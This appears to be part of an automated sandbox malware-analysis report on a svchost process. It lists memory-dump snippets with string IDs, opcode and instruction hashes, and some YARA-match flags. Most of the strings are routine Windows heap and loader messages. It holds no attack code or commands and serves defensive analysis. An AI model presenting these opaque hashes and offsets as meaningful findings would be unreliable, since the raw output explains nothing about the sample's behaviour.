                                          • Instruction Fuzzy Hash: 50325675A017199BDB21DF65CD88BDAB7F8FF48304F1041EAE509AB250EB70AA84CF54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                          • API String ID: 0-3393094623
                                          • Opcode ID: 4df38a12d84b5784f3ae92eada6a23063a2eb516cbd90a3db17ff7bf2ce9e9f6
                                          • Instruction ID: b4bbb8a3345e8df193a233aff2847d6fbb3dccb76847ee3e3fdb4cc015cfd3f5
                                          • Opcode Fuzzy Hash: 4df38a12d84b5784f3ae92eada6a23063a2eb516cbd90a3db17ff7bf2ce9e9f6
                                          • Instruction Fuzzy Hash: E80247759483418BD720CF64C184BABFBE9BF8A704F48895EE9998B350E770D845CB92
                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 03655247
                                          • Kernel-MUI-Language-Allowed, xrefs: 0365527B
                                          • WindowsExcludedProcs, xrefs: 0365522A
                                          • Kernel-MUI-Language-Disallowed, xrefs: 03655352
                                          • Kernel-MUI-Language-SKU, xrefs: 0365542B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: db691c9df998bc7dca5f14913f6d83fd39be106608a56654a86aac575ff5a186
                                          • Instruction ID: 2e24198e7618d9fd888421c9e0721b4db3869862d1ff53ce57264453007a6ab2
                                          • Opcode Fuzzy Hash: db691c9df998bc7dca5f14913f6d83fd39be106608a56654a86aac575ff5a186
                                          • Instruction Fuzzy Hash: D8F15E76D10218EFCF15DFA4C944AEEBBBDEF49610F54406AEA02AB350E7709E01CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                          • API String ID: 0-2518169356
                                          • Opcode ID: d19f665de6145a23464f17b97a3df762c7a734309cf6e7456998d0b1962578c8
                                          • Instruction ID: faa293ad065d6e7de36ca2f0e14ba8532ee0e66932fe4de1b3f16d417c6be6df
                                          • Opcode Fuzzy Hash: d19f665de6145a23464f17b97a3df762c7a734309cf6e7456998d0b1962578c8
                                          • Instruction Fuzzy Hash: 2191CE72D006199BCB21CFA9C981AFEB7B4EF89310F594169E912EB350D735D981CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1975516107
                                          • Opcode ID: e9bce0ca7d71ad87aa926909e0c09ac35583136da5c8a7dd21dab9b7836afb74
                                          • Instruction ID: 00efb9c74984a7da902590043fdc1eb3fbf7d88aa40c5547363a3a4106228ecf
                                          • Opcode Fuzzy Hash: e9bce0ca7d71ad87aa926909e0c09ac35583136da5c8a7dd21dab9b7836afb74
                                          • Instruction Fuzzy Hash: C451CC75E00345DFDB24EFA4C5847ADBBB1BF49318F288169E801AB3D1D778A981CB80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          • Opcode ID: 390661258646eeb5ce7db219dbb8f14cffbec3184d563b1540ed82491d4826c0
                                          • Instruction ID: 0332578842834aaf90e002846663bdabf86e8451aa4e08cc4e6a64e8a71b8f3b
                                          • Opcode Fuzzy Hash: 390661258646eeb5ce7db219dbb8f14cffbec3184d563b1540ed82491d4826c0
                                          • Instruction Fuzzy Hash: 28012836648A60DED229F319D40EF57BBD4DB47A70F19404DE0104F692CAE49880C928
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 3fd0cfbd61013f7919ead066e3533beb73be444fa71dbf6bd8aaf22eecdd1f7a
                                          • Instruction ID: 8010ee9bfdacfffd91313a7cd346c0c7c5e4772cfe80c8784da66ebd3cb2a17f
                                          • Opcode Fuzzy Hash: 3fd0cfbd61013f7919ead066e3533beb73be444fa71dbf6bd8aaf22eecdd1f7a
                                          • Instruction Fuzzy Hash: 6F139A70E00655DFDB29CF68C9807AAFBF1BF49304F1881A9D859AB381D735A946CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-3570731704
                                          • Opcode ID: 3b3422b8ad626369b6065282067b3dbf932e79d6d1411e3bdd2ca28759595f88
                                          • Instruction ID: 207d8bdc2e9b9ac840d5169847e68bee684e19f89c6b0ba403329769e768eb60
                                          • Opcode Fuzzy Hash: 3b3422b8ad626369b6065282067b3dbf932e79d6d1411e3bdd2ca28759595f88
                                          • Instruction Fuzzy Hash: C4925775E00268CFEB25CF18C940BA9B7B9BF46314F0981EAD94AAB350D7749E81CF15
                                          Strings
                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03697D39
                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03697D56
                                          • SsHd, xrefs: 0364A885
                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03697D03
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                          • API String ID: 0-2905229100
                                          • Opcode ID: 704b97210f796c4f7b329dfb576abca5c39fa37ad633598925c68217e32c54c6
                                          • Instruction ID: c7a2d3143bf4a17592fb71fa2447cf15ff0a1dbaead91b037836ee3d31c60cfb
                                          • Opcode Fuzzy Hash: 704b97210f796c4f7b329dfb576abca5c39fa37ad633598925c68217e32c54c6
                                          • Instruction Fuzzy Hash: 2ED17A35E50219AFDF24CFA8C980AADF7B5FF48310F19416AE845AB351D771E981CBA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: c911a3fe964cba207369e77acec52996926706a5d937dba918cbb5ac7797f165
                                          • Instruction ID: 1d1a713801701c58b7fb724b231d1dd4a520da7f9ed6cb0412308eb216dc7ddf
                                          • Opcode Fuzzy Hash: c911a3fe964cba207369e77acec52996926706a5d937dba918cbb5ac7797f165
                                          • Instruction Fuzzy Hash: B9E2BF74E006158FDB29CF69C591BAAFBF1FF49304F188199D849AB385DB34A846CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: fc053538af66c696dd4f307808f14be0ec8fefc8c59e7ac7b50d88d981995292
                                          • Instruction ID: a74868723c90a63a18362ad2b71d5765b5d400c7e71879abf08eced96c4aa607
                                          • Opcode Fuzzy Hash: fc053538af66c696dd4f307808f14be0ec8fefc8c59e7ac7b50d88d981995292
                                          • Instruction Fuzzy Hash: 25C18774508386DFDB10CF98C144B6AB7E8BF86704F04896AF8D68B351E334C94ADB66
                                          Strings
                                          • HEAP: , xrefs: 036954E0, 036955A1
                                          • HEAP[%wZ]: , xrefs: 036954D1, 03695592
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 036954ED
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 036955AE
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: 7f96ca36c8a509b0e9a803b4fbb077a9f73c1c66a7e328f4b82a1918980512f6
                                          • Instruction ID: a117a49997abac40d68902d0d6b1d5ca18416cb40009dac25e4bbfbc41b1a832
                                          • Opcode Fuzzy Hash: 7f96ca36c8a509b0e9a803b4fbb077a9f73c1c66a7e328f4b82a1918980512f6
                                          • Instruction Fuzzy Hash: 81A1F134A04625DFDB24DF28C940BBAFBE5EF46300F18856ED6968B782D774A845CB90
                                          Strings
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 036A21D9, 036A22B1
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 036A22B6
                                          • SXS: %s() passed the empty activation context, xrefs: 036A21DE
                                          • .Local, xrefs: 036628D8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 51a3dceae6a4addfc07953bcc29b0a7d2fa2f15504eaaeb80e2fcacf3d540e5c
                                          • Instruction ID: 905c521ab44aaf4e7a28f89affa1539bfd952b7c7fe505270f7eeb2590cbdd8d
                                          • Opcode Fuzzy Hash: 51a3dceae6a4addfc07953bcc29b0a7d2fa2f15504eaaeb80e2fcacf3d540e5c
                                          • Instruction Fuzzy Hash: 5CA1C135940229DFCB24CF69CD98BA9B3B4BF58354F1849E9D848AB351D7309E81CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          • Opcode ID: 8ded01df173ea63816c809eff459c024424e26014d3d46bcb10b88773a3aa357
                                          • Instruction ID: e59a4751c5b4f8068db8e06b5ea877ea1a48c0706b3d4060e7ba87b01280271c
                                          • Opcode Fuzzy Hash: 8ded01df173ea63816c809eff459c024424e26014d3d46bcb10b88773a3aa357
                                          • Instruction Fuzzy Hash: F7612436205B809FD721EB24CA44F67BBE8EF84714F190968F9558F391C735D845CB62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 0-336120773
                                          • Opcode ID: 8e80f84559d280d86fca47a56a57caccf083d2d216aaa051492063be2cb6ea9b
                                          • Instruction ID: 426c4992b92e84d5824b540b06da6231e40f444e516b3efabb0d2fdf3307024e
                                          • Opcode Fuzzy Hash: 8e80f84559d280d86fca47a56a57caccf083d2d216aaa051492063be2cb6ea9b
                                          • Instruction Fuzzy Hash: B5310E35601610EFC711DBA8CC86F6BB7E8EF0B620F190049E412CF291D670ED88EA6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                          • API String ID: 0-1391187441
                                          • Opcode ID: 6ea158822dcd103d89b9f5788b4ca83e562cda54d17e514fd659861d64eab67e
                                          • Instruction ID: 27b0681d14de7ffb4b75c89c2ab5c4fb49db492c8740b71d886c934b95bbfd05
                                          • Opcode Fuzzy Hash: 6ea158822dcd103d89b9f5788b4ca83e562cda54d17e514fd659861d64eab67e
                                          • Instruction Fuzzy Hash: 9531A236A00614AFCB11EB46C889F9EBFF8EF45B20F154165E915AB291D7B0E940CE64
                                          Strings
                                          • HEAP: , xrefs: 03643264
                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0364327D
                                          • HEAP[%wZ]: , xrefs: 03643255
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                          • API String ID: 0-617086771
                                          • Opcode ID: 5ee53b4f3f707573a1824395466f2a37f8394fd89810dd3af2c55cb56377896e
                                          • Instruction ID: e551bf6252910c8f41355ebfbe537fcdedde3e79d5fb30c6ea545229045044a0
                                          • Opcode Fuzzy Hash: 5ee53b4f3f707573a1824395466f2a37f8394fd89810dd3af2c55cb56377896e
                                          • Instruction Fuzzy Hash: A392CB74E042489FDB25CF68C5547AEBBF1FF09300F2884A9E899AB391D735A942CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: c4b8e071f2789d9a866296d6b8c3eea2ab42ccf0cbd210145798dd9cb28b4b13
                                          • Instruction ID: 2b87858562040dfd1f8efb95449a41afca5c3133cba8ea5a978de2e7be60714c
                                          • Opcode Fuzzy Hash: c4b8e071f2789d9a866296d6b8c3eea2ab42ccf0cbd210145798dd9cb28b4b13
                                          • Instruction Fuzzy Hash: F622EC70A007019FEB16DF28C594B7AFBF9EF06704F28849AE5568B382D771D882CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • API String ID: 0-2876891731
                                          • Opcode ID: 5dcd71b91432a139db6f7fdf6ae244b573d3a57d303d306f1f8b4ebc9892e036
                                          • Instruction ID: 970e1e6c2eb5572221054081cb045306dc4f79b8e693fbf99f600cbcc0516843
                                          • Opcode Fuzzy Hash: 5dcd71b91432a139db6f7fdf6ae244b573d3a57d303d306f1f8b4ebc9892e036
                                          • Instruction Fuzzy Hash: 2541B034A04649DBEF15CF99C950BAAB7F8EF46304F2844AADC40DB3A5E335D941CB41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@
                                          • API String ID: 0-380025441
                                          • Opcode ID: c93007812512a8f47c54d277b154f11fc84f79e93fe3642663ae41977557109f
                                          • Instruction ID: 1eeef98b9222b5c2e4068286194c2290e8919a001eb6d77d27bba13261c55ff4
                                          • Opcode Fuzzy Hash: c93007812512a8f47c54d277b154f11fc84f79e93fe3642663ae41977557109f
                                          • Instruction Fuzzy Hash: FC31B37A508344EFC311DF28C980A5BBBE8FBC5694F58092EF59597360EA30DD05CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 3d635077db32ab043391ab1d83842ce61f1b010174d51ec6212a2ac2cd4b1db1
                                          • Instruction ID: def04f2a4e08c6e44b639ae7ec58c3fd4a0cda41ca06e85e6e39239bf36bdefd
                                          • Opcode Fuzzy Hash: 3d635077db32ab043391ab1d83842ce61f1b010174d51ec6212a2ac2cd4b1db1
                                          • Instruction Fuzzy Hash: 3F824975E002189BDB24CFA9C980BEDFBB5FF4A710F188169E85AAB391D7309D41CB54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: P`owRbow
                                          • API String ID: 0-263301770
                                          • Opcode ID: 3097b659f3c0e12a4a67db8477c355f035d6f747438bc50806d54017c03a4a1f
                                          • Instruction ID: bdd28e9116e0171cc4b69c70332d2b31decd27e6efcac9248ed54c8a0f30740a
                                          • Opcode Fuzzy Hash: 3097b659f3c0e12a4a67db8477c355f035d6f747438bc50806d54017c03a4a1f
                                          • Instruction Fuzzy Hash: 0842F37DD04249AADF29EF68DA546BDFBB0AF0DB10F3C825AD441AB380D7748981CB54
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60d3993411c8823ec46c496abefb167364dbb92d09aeaa0badcb3d0c38b155e4
                                          • Instruction ID: c72d7e21aa660630aab053b34df6614b7166a4c03696f19f6f4eac8964624f97
                                          • Opcode Fuzzy Hash: 60d3993411c8823ec46c496abefb167364dbb92d09aeaa0badcb3d0c38b155e4
                                          • Instruction Fuzzy Hash: 4DA18FB5608342CFD724DF28C580A2ABBE9FF89314F24496EE5858B351D730E945CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: a23065dfd1f7c0bda078af53e8cac8e49f9103cb0f2687e8c8bec579f63a991a
                                          • Instruction ID: 6f20ff28364915122a468ccee0b0b540335eec60431b9d76cfb865f03a52b7c9
                                          • Opcode Fuzzy Hash: a23065dfd1f7c0bda078af53e8cac8e49f9103cb0f2687e8c8bec579f63a991a
                                          • Instruction Fuzzy Hash: 6BF19E79608745CFDB21CF24C590B6ABBE5AF88A50F29487DFC8A8B340DB30D945CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: c577888cd4d70528e4315cb6aea9be07035f2d65fa9205ecf0dd0b8bb5afca87
                                          • Instruction ID: 51dd04583478addddb396dbd2696b409947b031f63e3d0a80bfeef41b7239a53
                                          • Opcode Fuzzy Hash: c577888cd4d70528e4315cb6aea9be07035f2d65fa9205ecf0dd0b8bb5afca87
                                          • Instruction Fuzzy Hash: 83021E76E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction ID: b524d719206992a9a68ffaadc578d71d4edddff9dd5102106b9d20b215f9678d
                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction Fuzzy Hash: D1021E76E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 023c9aa3ba730e8dff961ab03c800ed178392423829caf6ed411e04152ac83bf
                                          • Instruction ID: c7f2ed9faacc10fb7b4ac0b0360b3df091f8f0f1326ef43721c1dde4de406b91
                                          • Opcode Fuzzy Hash: 023c9aa3ba730e8dff961ab03c800ed178392423829caf6ed411e04152ac83bf
                                          • Instruction Fuzzy Hash: D0F1D179E00258DBDB25DF98D981ABEBBF1FF4A700F688029E441AB350D7749C41CB65
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 908288775244fba5e7657664d9a15f1a7e495d0b5839d18e1909d4f8f0143b64
                                          • Instruction ID: bc99c930b40c4da76929bcfbd83a8513674420713844b09f3889f73e16352f97
                                          • Opcode Fuzzy Hash: 908288775244fba5e7657664d9a15f1a7e495d0b5839d18e1909d4f8f0143b64
                                          • Instruction Fuzzy Hash: 40414AB4900288AFDB20DFA9D580AADFBF4FB49340F54816ED959EB211D734A950DF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: cfc405c0a1a7c7a04ecaf35f9db0f8b7c162ebbd600aa53015ab419d75e7064a
                                          • Instruction ID: 07159e96efa2cd17355f1abeb3b63d93af1dfa92dbd1209198c2ffa6f7f29da9
                                          • Opcode Fuzzy Hash: cfc405c0a1a7c7a04ecaf35f9db0f8b7c162ebbd600aa53015ab419d75e7064a
                                          • Instruction Fuzzy Hash: 36A15D35A083686BDF24DB688A41BFEA7B85F4B304F0840DDED876B381C6B5C949CB55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: 1a44244ca997e04928b26640cd75a2126115a72ca856b0f3cb1cf4117fdd01a8
                                          • Instruction ID: e489b179006cfa1e171b88ac69ea38764c3d16dcfa29eb499e8209c49e8c2957
                                          • Opcode Fuzzy Hash: 1a44244ca997e04928b26640cd75a2126115a72ca856b0f3cb1cf4117fdd01a8
                                          • Instruction Fuzzy Hash: E9713975E0061A9FDB28CF9CD6946ADBBB5BF48740F18816EE806AB340D7709D41CF64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: P^
                                          • API String ID: 0-2008101720
                                          • Opcode ID: 75d445eb10a09a01e41d6a9b87e5dfd9f850dcd8ded6b06d9709727e7ca24427
                                          • Instruction ID: aab23c59a63454cd6d9a3c47a39911bf7f8060d29294eb05fccf2f7292cd95f2
                                          • Opcode Fuzzy Hash: 75d445eb10a09a01e41d6a9b87e5dfd9f850dcd8ded6b06d9709727e7ca24427
                                          • Instruction Fuzzy Hash: CA512876F0020A47CB2CCD5EDD8426AB252EBE4315F1C827BDD08AF7D1E6B9AD1586C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction ID: 1cfc58168302b2c59493645412338db0ecc247658966df5d6d3be76a11286db7
                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction Fuzzy Hash: 11617D75D00219ABDF21DF99C944BAEFBF8FF85714F144A6AE810A7290D7B49901CF50
                                          Strings
                                          Memory Dump Source
